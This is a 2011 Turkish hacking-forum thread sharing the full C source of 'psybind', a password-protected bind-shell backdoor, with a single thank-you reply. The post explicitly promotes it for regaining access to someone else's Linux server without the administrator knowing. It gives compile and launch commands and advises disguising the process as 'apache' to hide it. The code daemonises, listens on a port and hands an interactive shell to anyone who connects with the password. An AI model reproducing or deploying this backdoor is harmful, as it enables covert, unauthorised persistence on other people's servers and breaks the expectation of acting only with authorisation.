THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Kendi Shell Hesabınızı Oluşturun!![ Pseudo Backdoor]

bcs_crew - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2010
Nereden:
İstanbul - İkitelli
Yaş:
26
Mesajlar:
550
Konular:
67
Teşekkür (Etti):
6
Teşekkür (Aldı):
77
Ticaret:
(0) %
10-07-2011 10:22
#1
Kendi Shell Hesabınızı Oluşturun!![ Pseudo Backdoor]
Herhangi bir linux servera erişiminiz olduğunu ve bu erişimin süre ile kısıtlı olduğunu
düşünün... Bu public bir Shell sunucusu olabileceği gibi, arkadaşınızın, ya da bir şekilde
bağlantı sağlayabildiniz bir sunucu olduğunu ve bu sunucuya tekrar adminin haberi olmadan
erişmek istediğinizi düşünün ...

Tabii ki sunucuya bir backdoor kurarsınız... Ancak bu backdoorun oldukça gelişmiş ve

kendini saklayabilen bir backdoor olması gerekmekte. Ve de sizin çözümünüz Psuedo

Öncelikle dosyamızı ekten indirin ve backdoor açmak istediğiniz sunucuya aktarın.

Ve ardından aşağıdaki adımları izleyin:


1- gcc - o psybind psybind.c komutu ile dosyayı compile edin.
2- ./psybind -s /bin/sh -c apache -r /home -w sifre -p 7654
Buradaki apache görünecek process ismi(bunu top komutu ile çalışan processleri listeleyip
istediğinizi seçerekte yapabilirsiniz), /bin/sh Shell pathi, /home başlangıç klasoru, -w
tabiiki şifre ve 7654 te bağlantı portu.

./psybind yazarak paramterlereleri görebilirsiniz.


3- Kendi bilgisayarınızdan ayarladığınız port ile sunucuya bağlantı kurun ve

keyfinize bakın
Code :

/*
O O o o . . . . . . . . o o O O
O O
. .
. RST/GHC Pseudo Bind Shell [ psybind.c ] .
. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= .
. [v 1.0.0] .

[Compiling]:
$ gcc -o psybind psybind.c

[Usage]:
$ ./psybind <options>

[Option] [Default] [Description]
-p [7654] Port number
-w [rstghc] Set password
-r [/] Start path
-c [[HTTP]] Fake process name
-s [/bin/bash] Shell(program) path
-h This screen

[Example]:
. Run in Remote Host: .
. $ ./psybind -s /bin/sh -c girl -r /home -w 123 -p 31337 .
. .
. To connect with remote computer: .
o $ nc 127.0.0.1 31337 o
o o
O Code by Dr_UF0_51 (civufo[at]mail.ru) O
O Good luck O
O O o o . . . . . . . . o o O O
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <unistd.h>
#include <netinet/in.h>
#include <errno.h>
#include <termios.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/types.h>
#include <strings.h>
#include <signal.h>
#include <wait.h>
#include <string.h>

#define BUFSIZE 1024

**** usage(****);
**** waitpd(int);

char motd[] = "\nWelcome to RST/GHC - Pseudo Bind Shell\n\n";

int main(int arg, char **param)
{
int sd, nread, datas, td, i, dn, pid;
int sins = 0x10; // Size
int ptym, ptyn;

struct sockaddr_in saddrs;
struct sockaddr_in saddrd;
struct termios terms;

fd_set fds;
char *buffer[BUFSIZE];
char *password[255], c;

int port = 7654; // Port number
char pass[255] = "rstghc"; // Password
char path[255] = "/"; // Start path
char cmdname[255] = "[HTTP]"; // Fake process name
char shell[255] = "/bin/bash"; // Program [shell]

/* Arguments */
while(( c = getopt(arg, param, "p:w:c:r:s:h")) > 0)
switch(c)
{
case 'p':
port = atoi(optarg);
break;
case 'w':
strncpy(pass, optarg, 255);
break;
case 'c':
strncpy(cmdname, optarg, 255);
break;
case 'r':
strncpy(path, optarg, 255);
break;
case 's':
strncpy(shell, optarg, 255);
break;
case 'h':
usage();
exit(0);
break;
}

/* Port check */
if( port > 65535 | port < 1)
{
fprintf(stderr, "Error: Ports must be > 0 and < 65535\n");
exit(1);
}

/* Creat Socket struct */
bzero(&saddrs, sizeof(saddrs));
saddrs.sin_family = AF_INET;
saddrs.sin_port = htons(port);
saddrs.sin_addr.s_addr = INADDR_ANY;

/* Creat Socket */
if(( sd = socket( AF_INET, SOCK_STREAM, 0)) < 0)
{
fprintf(stderr, "Error[%d]: Creat Socket Failed\n", errno);
exit(2);
}

/* Bind Port */
if( bind(sd, (struct sockaddr *)&saddrs, sizeof(saddrs)) < 0)
{
fprintf(stderr, "Error[%d]: Bind Port Failed\n", errno);
close(sd);
exit(3);
}

/* Listen Port */
if( listen(sd, 5) < 0) // Max active connections = 5
{
fprintf(stderr, "Error[%d]: Listen Port Failed\n", errno);
close(sd);
exit(4);
}

/* PID */
if((pid = fork()) != 0)
{
printf("Shell Started.. [pid = %d] Good luck \n", pid) ;
exit(0);
}

chdir(path); // Path
setsid(); // Run in a new session
signal(SIGCHLD, waitpd); // Waitpid

/* Wait Data */
for(;
{
if(( datas = accept(sd, (struct sockaddr *)&saddrd, &sins)) > 0) // If data accepted, start
if((pid = fork()) < 0)
continue;
else if(pid == 0)
{

/* Open Pseudo - Terminal Master*/
if(( ptym = getpt()) < 0)
{
fprintf(stderr, "Error[%d]: Can't Open Pseudo - Terminal Master\n", errno);
exit(5);
}

/* Unlock Slave Pseudo Terminal */
if( unlockpt(ptym) < 0 )
{
fprintf(stderr, "Error[%d]: Can't Unlock Slave Pseudo Terminal\n", errno);
exit(6);
}

/* Process Group Id*/
if(setpgid(0, 0) < 0)
{
fprintf(stderr, "Error[%d]: Setpgid Failed\n", errno);
exit(8);
}

ptyn = ptsname(ptym); // Name of the slave pseudo-terminal
tcgetattr(0, &terms); // Sandart input

/* Open terminal */
if(( td = open((char *)ptyn, O_RDWR)) < 0)
{
fprintf(stderr, "Error[%d]: Can't Open Terminal Name\n", errno);
exit(7);
}

/* Fork */
if( fork() == 0)
{
if(setsid() < 0)
{
fprintf(stderr, "Error[%d]: setsid Failed\n", errno);
exit(6);
}

tcsetattr(td, TCSANOW, &terms); // Set parametr now

write(td, "Password: ", 10);
read(td, password, sizeof(password));

dup2(td, 0);
dup2(td, 1);
dup2(td, 2);

/* Check password */
if(!chpass(password, pass))
{
write(td, motd, strlen(motd));
close(td);
execl( shell, cmdname, 0); // Exec shell
}
close(td);
}

close(td);

for(;
{
FD_ZERO(&fds);
FD_SET(datas, &fds); // Set datas for select
FD_SET(ptym, &fds); // Set ptym for select

if((i = select( ptym + 1, &fds, NULL, NULL, NULL)) <= 0)// Wait data for select descriptor
break;

if(FD_ISSET(datas, &fds)) // If socket
{
bzero(buffer, sizeof(buffer));
if(( nread = read (datas, buffer, BUFSIZE)) <= 0)
break;
if( write(ptym, buffer, nread) <= 0)
break;
}

if(FD_ISSET(ptym, &fds)) // If pty
{
bzero(buffer, sizeof(buffer));
if(( nread = read ( ptym, buffer, BUFSIZE)) <= 0)
break;
if(write(datas, buffer, nread) <= 0)
break;
}
}
close(datas);
close(ptym);
exit(0);
} // fork
close(datas);
} // for
}

/** Waitpid ( warning zombie **/
**** waitpd(int i)
{
waitpid(-1, NULL, WNOHANG);
}

/** Usage **/
**** usage(****)
{
printf("\n\t RST/GHC Pseudo Bind Shell");
printf("\t =--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=\n");
printf("\t\t\t\t\t\t\t\tby Dr_UF0_51\n\n");
printf("Usage: ./psybind <options>\n");
printf("\t-p [7654] Port number\n");
printf("\t-w [rstghc] Set password\n");
printf("\t-r [/] Start path\n");
printf("\t-c [[HTTP]] Fake process name\n");
printf("\t-s [/bin/bash] Shell(program) path\n");
printf("\t-h This screen\n");
}

/** Check Password **/
int chpass(char *str1, char *str2)
{
int i, s1 = 0, k = 1;

if(str1[strlen(str1) - 1] = 0x0d) k++; // if telnet
for(i = 0; i < strlen(str1) - k; i++)
if( str1[i] != str2[i] )
{
s1 = 1;
break;
}
if( strlen(str1) == k ) s1 = 1; // If ENTER pressed

return
(s1);
}
--------------------- Yardımcı Olduysam Teşekkürü İhmal Etme
solarisfem Teşekkür etti.
DarkDance - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2006
Mesajlar:
36
Konular:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
1
Ticaret:
(0) %
13-07-2011 16:22
#2
paylaşım için çok teşekkürler

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler